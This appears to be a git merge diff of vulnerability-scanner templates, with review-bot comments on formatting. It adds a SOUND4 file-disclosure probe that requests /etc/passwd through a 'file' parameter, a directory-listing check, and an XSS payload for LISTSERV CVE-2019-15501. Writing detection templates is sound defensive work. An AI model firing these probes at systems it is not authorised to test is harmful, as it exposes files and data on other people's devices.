Merge branch 'main' into uvicorn-detect
commit
e12559a70d
|
@ -9,7 +9,6 @@ reviewers:
|
|||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- princechaddha
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
|
@ -17,9 +16,9 @@ numberOfReviewers: 1
|
|||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- ritikchaddha
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
|
|
|
@ -1 +1,3 @@
|
|||
cves/2022/CVE-2022-1168.yaml
|
||||
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
|
||||
|
|
|
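Review bot: the third path in this list, the one for sound4-directory-listing.yaml, is a quoted string that begins with the octal escapes \342\200\216\342\200\216. Those are the UTF-8 bytes of U+200E (left-to-right mark), twice, so the template is recorded under a directory whose name starts with two invisible characters rather than under the plain misconfiguration/ directory. Move the file to misconfiguration/sound4-directory-listing.yaml and regenerate this list; the invisible prefix is easy to miss in review and will not match anything that selects templates by the misconfiguration/ path.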
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
|||
|
||||
info:
|
||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
author: LogicalHunter,arafatansari
|
||||
severity: medium
|
||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
description: |
|
||||
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||
|
@ -14,6 +15,9 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-15501
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"LISTSERV"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,xss,listserv,edb
|
||||
|
||||
requests:
|
||||
|
@ -24,9 +28,12 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
- 'LISTSERV'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -1 +1 @@
|
|||
5.3.6
|
||||
5.3.8
|
|
@ -1 +1 @@
|
|||
4.5.4
|
||||
4.5.5
|
|
@ -3681,3 +3681,8 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "uvicorn"
|
||||
|
||||
name: tornado
|
||||
part: header
|
||||
words:
|
||||
- "TornadoServer/"
|
|
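Review bot: the added tornado entry starts at "name: tornado" with no "- type: word" line in front of it, whereas every other matcher visible in this commit opens with "- type:". The hunk header (+3681,8) accounts for exactly the five added lines shown, so the line is missing from the change rather than hidden in context. As rendered, name, part and words would not start a new list item after the uvicorn matcher; add "- type: word" above "name: tornado" so tornado is its own matcher.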
@ -0,0 +1,30 @@
|
|||
id: sound4-file-disclosure
|
||||
|
||||
info:
|
||||
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
|
||||
metadata:
|
||||
shodan-query: http.html:"SOUND4"
|
||||
verified: "true"
|
||||
tags: packetstorm,lfi,sound4,unauth,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
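Review bot: the regex matcher at the end of this new template has no "part:" key, so it relies on the default, while the word matchers in the CVE-2019-15501 hunk of this same commit state "part: body" explicitly; add "part: body" under "- type: regex" so the intent is visible. Two smaller points in the info block: the name uses "<=2.x (PHPTail) Unauthenticated File Disclosure" where the sibling sound4-directory-listing template uses the "<=2.x - Information Disclosure" form, and there is no classification section (for example a cwe-id) like the one the CVE-2019-15501 template carries.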
@ -0,0 +1,32 @@
|
|||
id: sound4-directory-listing
|
||||
|
||||
info:
|
||||
name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"SOUND4"
|
||||
tags: misconfig,listing,sound4,disclosure,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/log/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Index of /log</title>"
|
||||
- "Parent Directory"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
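Review bot: in the metadata block this template writes "verified: true" as a bare boolean, while sound4-file-disclosure and the CVE-2019-15501 change in the same commit write verified: "true" as a quoted string; pick one form so tooling that reads the field sees a single type. The word matcher also has no "part:" key and relies on the default; add "part: body" to match the style used in the CVE-2019-15501 matchers. This is also the file that the template list earlier in the commit records under a path with invisible leading characters, so check the directory name when fixing it.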